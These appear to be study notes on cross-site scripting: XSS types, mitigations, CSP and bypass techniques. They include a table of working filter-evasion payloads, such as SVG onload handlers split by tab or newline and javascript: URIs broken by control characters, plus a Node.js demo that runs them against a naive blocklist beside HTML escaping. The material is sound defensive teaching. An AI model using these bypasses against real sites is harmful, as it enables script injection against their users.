XSS
- Type
  - Self-XSS
  - Reflected XSS
  - Stored XSS
- Mitigation
  - Filter
    | Pattern | Bypass |
    |---|---|
    | `[SPACE]on...=` | `<svg<TAB>onload=alert(1)>` |
    | `[SPACE]on...=` | `<svg\nonload=alert(2)>` |
    | `[SPACE]on...=` | `<svg/ onload=alert(3)>` |
    | `javascript:` | `<a href="\x01javascript:alert(4)">X</a>` |
    | `javascript:` | `<a href="java\tscript:alert(5)">X</a>` |
    | `javascript:` | `<a href="java<TAB>script:alert(6)">X</a>` |
    | `<script` | JSFuck |
  - Escape (HTML Entity)

    | Symbol | Alternative |
    |---|---|
    | `<` | `&lt;` |
    | `>` | `&gt;` |
    | `"` | `&quot;` |
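The two tables above make one point: a blocklist that looks for a fixed pattern is bypassed by any whitespace or control-character variant the browser still accepts, while entity-escaping the output neutralizes every variant at once. The following Node.js example is added here (it is not part of the original notes) to show both sides: a naive filter of the kind the bypass table defeats, run against those same variants written out as real characters, beside an `escapeHtml` that encodes the three symbols from the escape table plus `&` and `'` so the result is safe in single-quoted attributes as well. The filter regexes and sample strings are constructed for the demo.

```javascript
// Added example (not part of the original notes): why a pattern-based
// blocklist is weak, and how HTML entity escaping of the output neutralizes
// the same inputs regardless of the whitespace/control-character trick used.
// Node.js, no dependencies.

// A naive blocklist: it only recognizes "<tag on...=" with a literal space
// and 'href="javascript:' with nothing in front of the scheme.
const NAIVE_PATTERNS = [/<[a-z]+ on[a-z]+=/i, /href="javascript:/i];

function naiveFilterBlocks(input) {
  return NAIVE_PATTERNS.some((re) => re.test(input));
}

// HTML entity escaping for HTML text and quoted attribute contexts.
// The notes list <, > and "; & and ' are included too so the output is
// also safe inside single-quoted attributes and cannot be re-decoded.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed samples: the variants from the bypass table written out as
// real characters (\t, \n, \x01), plus two "plain" payloads that the
// blocklist does catch.
const BYPASS_SAMPLES = [
  "<svg\tonload=alert(1)>",
  "<svg\nonload=alert(2)>",
  "<svg/ onload=alert(3)>",
  '<a href="\x01javascript:alert(4)">X</a>',
  '<a href="java\tscript:alert(5)">X</a>',
];
const PLAIN_SAMPLES = [
  "<svg onload=alert(0)>",
  '<a href="javascript:alert(0)">X</a>',
];

// Runs a set of inputs through the blocklist and reports which it missed.
function auditFilter(samples) {
  const result = { blocked: [], missed: [] };
  for (const s of samples) {
    (naiveFilterBlocks(s) ? result.blocked : result.missed).push(s);
  }
  return result;
}

// True when the escaped string can no longer open a tag or break out of a
// quoted attribute: no raw <, >, " or ' survives.
function isNeutralized(escaped) {
  return !/[<>"']/.test(escaped);
}

function demo() {
  const audit = auditFilter(BYPASS_SAMPLES);
  console.log(`blocklist missed ${audit.missed.length}/${BYPASS_SAMPLES.length} variants`);
  for (const s of BYPASS_SAMPLES) {
    console.log(JSON.stringify(s), "->", escapeHtml(s), "neutralized:", isNeutralized(escapeHtml(s)));
  }
  return audit;
}

demo();
```

Entity escaping is context-specific: `escapeHtml` is correct for HTML text and quoted attribute values, but a value placed inside a URL, a `<script>` block or an event-handler attribute needs that context's encoding instead, which is why the CSP and Trusted Types items that follow matter even where escaping is in place.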
  - Content Security Policy (CSP) > CSP Evaluator
    - script-src
    - Nonce
    - trusted-types (Chrome)
      - HTTP response header
      - Define trusted resources
  - HttpOnly
- Bypass
  - `<base>`: changes the base URL of all relative URLs
  - Relative Path Overwrite (RPO)
- Case Study